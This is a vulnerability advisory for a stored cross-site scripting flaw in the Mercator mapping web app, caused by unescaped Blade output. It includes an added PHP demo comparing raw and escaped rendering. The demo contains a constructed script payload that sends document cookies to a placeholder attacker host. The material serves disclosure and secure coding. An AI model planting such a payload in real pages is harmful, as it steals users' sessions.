Mercator (information-system mapping web app): Stored Cross-Site Scripting via Unescaped Blade Output in User-Editable Fields
CVE-2026-27639
Summary
Mercator versions before 2026.02.22 render some entity fields (for example "contact point") with Blade's raw output directive (`{!! !!}`), so the stored value is inserted into the page without HTML escaping. Any authenticated account holding the User role can save arbitrary JavaScript in such a field when creating or editing an entity; the script then runs in the browser of every user who later views that entity, administrators included (stored XSS, CWE-79). Update to Mercator 2026.02.22 or later, which escapes the affected output.
What to do
Upgrade to Mercator 2026.02.22 or later; that release is the fix named in the vendor advisory. Until you can upgrade, limit who holds the User role and review stored free-text fields such as "contact point" for script or HTML content, since any payload already saved keeps executing for viewers until it is removed or the templates are fixed.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| sourcentis (GitHub: dbarzin) | mercator | < 2026.02.22 | 2026.02.22 |
Original title
Mercator is an open source web application designed to enable mapping of information systems. A stored Cross-Site Scripting (XSS) vulnerability exists in Mercator prior to version 2026.02.22 due to...
Original description
Mercator is an open source web application designed to enable mapping of information systems. A stored Cross-Site Scripting (XSS) vulnerability exists in Mercator prior to version 2026.02.22 due to the use of unescaped Blade directives (`{!! !!}`) in display templates. An authenticated user with the User role can inject arbitrary JavaScript payloads into fields such as "contact point" when creating or editing entities. The payload is then executed in the browser of any user who views the affected page, including administrators. Version 2026.02.22 fixes the vulnerability.
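The advisory attributes the bug to raw Blade output. The script below is an added illustration, not Mercator's own code or a copy of the patched templates: it reproduces what Blade compiles the two output directives to (`{!! $x !!}` becomes `echo $x;`, `{{ $x }}` becomes `echo e($x);`) so the difference can be run with plain PHP and no Laravel install. The `e()` stand-in mirrors Laravel's helper (`htmlspecialchars` with `ENT_QUOTES | ENT_SUBSTITUTE`); the field name "contact point" is from the advisory, while the payload, the table-cell markup and the helper names are constructed for the demo.

```php
<?php
// Added example (not Mercator's code). It reproduces what Blade compiles the two
// output directives to, so the difference can be exercised without Laravel:
//   {!! $value !!}  ->  <?php echo $value; ?>       (raw, no escaping)
//   {{ $value }}    ->  <?php echo e($value); ?>    (HTML-escaped)

// Stand-in for Laravel's e() helper (Illuminate\Support\helpers.php):
// htmlspecialchars with ENT_QUOTES so the value is inert in both element text
// and double- or single-quoted attribute contexts.
function e(?string $value, bool $doubleEncode = true): string
{
    return htmlspecialchars($value ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', $doubleEncode);
}

// Vulnerable rendering: the equivalent of `<td>{!! $entity->contact_point !!}</td>`.
function renderContactPointRaw(string $contactPoint): string
{
    return '<td>' . $contactPoint . '</td>';
}

// Fixed rendering: the equivalent of `<td>{{ $entity->contact_point }}</td>`.
function renderContactPointEscaped(string $contactPoint): string
{
    return '<td>' . e($contactPoint) . '</td>';
}

// Demo-only check: does the rendered fragment still contain a live <script>
// start tag (which a browser would execute), as opposed to &lt;script&gt; text?
function containsScriptTag(string $html): bool
{
    return (bool) preg_match('/<script\b/i', $html);
}

// Constructed payload of the kind an authenticated User-role account could
// store in "contact point". Not taken from the advisory; the host is made up.
$payload = 'ops@example.test<script>fetch("https://attacker.example/c?" + document.cookie)</script>';

$raw     = renderContactPointRaw($payload);
$escaped = renderContactPointEscaped($payload);

echo "raw:     {$raw}\n";
echo "escaped: {$escaped}\n";
printf("raw fragment carries a script tag:     %s\n", containsScriptTag($raw) ? 'yes' : 'no');
printf("escaped fragment carries a script tag: %s\n", containsScriptTag($escaped) ? 'yes' : 'no');
```

To find the same pattern in your own Laravel code base, search the view tree for the raw directive (for example `grep -rn '{!!' resources/views`) and keep `{!! !!}` only where the value has already been run through an HTML sanitizer; everything that originates from a user-editable field belongs in `{{ }}`. Note that `e()` covers HTML element and attribute contexts only; a value placed inside an inline `<script>` block or a `javascript:` URL needs context-specific encoding, which is a separate concern from this advisory.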
NVD CVSS v3.1 base score: 5.4
NVD CVSS v4.0 base score: 8.5
Vulnerability type
CWE-79
Cross-site Scripting (XSS)
- https://github.com/dbarzin/mercator/commit/839d231399944e43a865198262e96e0218252... Patch
- https://github.com/dbarzin/mercator/commit/9902ffd91f287e474729f514c77261f4ef7db... Patch
- https://github.com/dbarzin/mercator/commit/c58bb1d2fff18605c61d93cfaf77adca416c5... Patch
- https://github.com/dbarzin/mercator/security/advisories/GHSA-65p7-pph2-966g Vendor Advisory Mitigation
Published: 25 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026